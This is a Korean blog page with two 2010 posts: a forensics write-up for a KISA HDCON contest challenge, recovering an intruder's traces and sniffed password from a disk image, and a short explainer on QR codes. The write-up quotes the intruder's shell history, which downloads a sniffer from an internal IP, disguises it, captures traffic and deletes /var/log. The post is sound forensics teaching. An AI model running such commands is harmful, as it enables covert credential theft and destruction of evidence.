'hdcon 2010'에 해당되는 글 2건

  1. 2010.05.25 [ HDCON 2010 ] Kisa 해킹방어 대회 4번 (10)
  2. 2010.05.17 What is QR Code?

2010.05.25 15:46 WarGame


침입한 해커가 log 등이 삭제된 서버의 img 파일이 주어졌네요

포렌식분야군요

해커가 완벽히 로그를 지우지 않았다면

툴을 이용해 쉽게 내용을 볼 수 있을 겁니다

이러한 툴 종류는 여러가지가 있겠지만

여기서는 Access Data 의 FTK imager 를 써보겠습니다

http://www.accessdata.com/downloads.html

에서 ftk imager 를 받아보실 수 있구요

설치하시고 해당 이미지 파일을 로드 시키면

다음과 같은 모습을 볼 수 있습니다




혹시나 해서 /var/log 폴더를 찾아봤지만 삭제된 상태

/etc/passwd 나 /shadow 폴더도 찾아볼 수 없었습니다

하긴 후자 폴더의 경우는 문제가 의도한 바와는 좀 어긋날 수 있겠죠

아무튼

unallocated space 부분을 보면

몇가지 파일이 남아있습니다

이를 통해서 문제를 풀라 이거겠죠





8개 파일이 있는데

그중에 12792는 웹서버의 로그고

43983은 특정 사용자의 명령어 로그가 남아있네요

 발견하셨다면 반 이상은 푸신거나 다름없죠
ls -al
cd /usr/local/bin
ls -al
id
uname -a
pwd
cd /
ls -al
cat /etc/services
cd /usr/local/lib/python2.6/
wget 192.168.2.108/sniffit
chmod 755 spsn
mv sniffit perlxml
ls -al
ls -al /usr/local/lib/python2.6/
./perlxml -b -t 192.168.2.180 -R /usr/local/lib/python2.6/configx.py -F em0&
ls -alp /usr/local/lib/python2.6/
rm -rf /var/log/
ls -al /var/log/
exit
 

 python2.6 폴더에 sniffit을 받습니다

그리고 이름을 perlxml 로 바꾸고 sniffing 을 시작하죠

관리자가 접속하려 했다면 이때 걸렸을 겁니다

결과는 configx.py 에 저장이 되었고

이후에 로그를 지우는군요

흠 그러니까 캡쳐된 패킷이 어딘가 남아있고, 이를 분석하면 답이 나올껍니다

하지만 이 역시 python 2.6 폴더엔 없고 , unallocated space 에 있는거 같습니다

 elf 파일을 제외하곤 남은게 57224 파일 밖에 없군요

http://wiki.wireshark.org/Development/LibpcapFileFormat

에서 pcap 파일의 Magic Number 를 확인하셔도 되구요

아무튼 그 파일을 export 시켜서 pcap 로 확장자를 변환해주면

WireShark 로 파일을 읽을 수 있게 됩니다

패킷을 뒤적이다 보면 다음과 같이..Sniffing 한 패킷을 볼 수 있습니다



이후에 패스워드가 한자씩 담겨있고 이를 모으면 완성이죠


이런 툴이 싫으시다면

이미지 파일에서 직접 추출하실수도 있습니다

짐작이 가는 string을 찾으시면 되겠죠

로그를 지웠다고 했으니까 rm -rf /var/log 이런식으로 말이죠

거기에 있는 log를 통해 명령어를 보시고

sniffing  툴이 깔린걸 바탕으로 , pcap 파일이 있다는 걸 유추하시면 됩니다

pcap 의 Magic Number 를 search 하셔서 Hex 값을 쭉 뽑아내셔서 마찬가지로

WireShark 로 분석하시면 끗!



Posted by LinkC

2010.05.17 16:25 Etc../잡담




위와 같은 그림을 본 적 있지 않나요?

흡사 바코드와 비슷한 이는 'QR 코드' 라고 합니다

역할은 바코드와 다를바가 없습니다

특정 정보를 저 그림안에 내포하고 있는거죠

다른점이라면, 들어가는 정보의 크기 정도?

바코드보다 월등하게 많은 정보를 포함하고 있다니 놀라울 따름이지요

위 그림은 모바일 영어 위키백과의 QR 코드 구요

Encoder: http://qrcode.kaywa.com/

Decoder: http://zxing.org/w/decode.jspx

다음은 제 블로그 주소의 QR 코드 입니다



한번 Decode 사이트에 가셔서 위 2개의 QR 코드 해독해보시는 것도 재밌겠네요

어때요, 참 신기하죠?

사실 QR 코드는 초기에는 자동차 부품 생산 관리 등 바코드의 대체품으로 많이 쓰였다고 합니다

이후에는 스마트폰이 떠오름에 따라 증강현실과 현실을 이어주는 징검다리 중 하나로 재조명 받고 있지만요

어디다 써야 할지 좀 감이 안오시는 분은 아래 동영상을 보시면 QR code가 어떤 것인지 바로 알 수 있을겁니다

아이폰에서 앱을 이용해 QR 코드를 읽어내는 장면이 담겨있네요







나중에 알았지만 QR 코드의 개발국은 바로 일본이라고 하네요

그래서 일본에서 판매되는 대부분의 카메라폰은 QR 코드를 지원한다고 하는군요

또한, 이 코드를 개발한 회사 '덴소 웨이브'는 특허권을 행사하지 않음으로써 일반인들이 쉽게 쓸 수 있도록 했다니

실로 좋은 일이지 않을 수 없네요 :D




이번 키사 해킹방어 대회 hdcon 2010 의 첫번째 문제가 바로 QR code를 이용한 문제가 나왔었죠

그림파일 달랑 하나만 나와서 스테가노 그래피인가도 의심해봤지만 역시 저기 있는 QR code 가 좀 미심쩍죠



Decode 해보시면 답이 나옵니다 :D

'Etc.. > 잡담' 카테고리의 다른 글

Google Chrome Loading Problem  (4) 2010.05.28
[ Tistory ] 초대장 발급!  (5) 2010.05.26
What is QR Code?  (0) 2010.05.17
[ 해커 간담회 ]  (0) 2010.05.04
초대장 5장 뿌립니다 '-'  (6) 2010.03.31
소스 코드 포스팅시 팁  (4) 2010.02.01
Posted by LinkC
이전버튼 1 이전버튼

블로그 이미지
LinkC

태그목록

Tistory Cumulus Flash tag cloud by BLUEnLIVE requires Flash Player 9 or better.

공지사항

Yesterday57
Today61
Total309,989

달력

 « |  » 2018.05
    1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31    

최근에 받은 트랙백

글 보관함


. .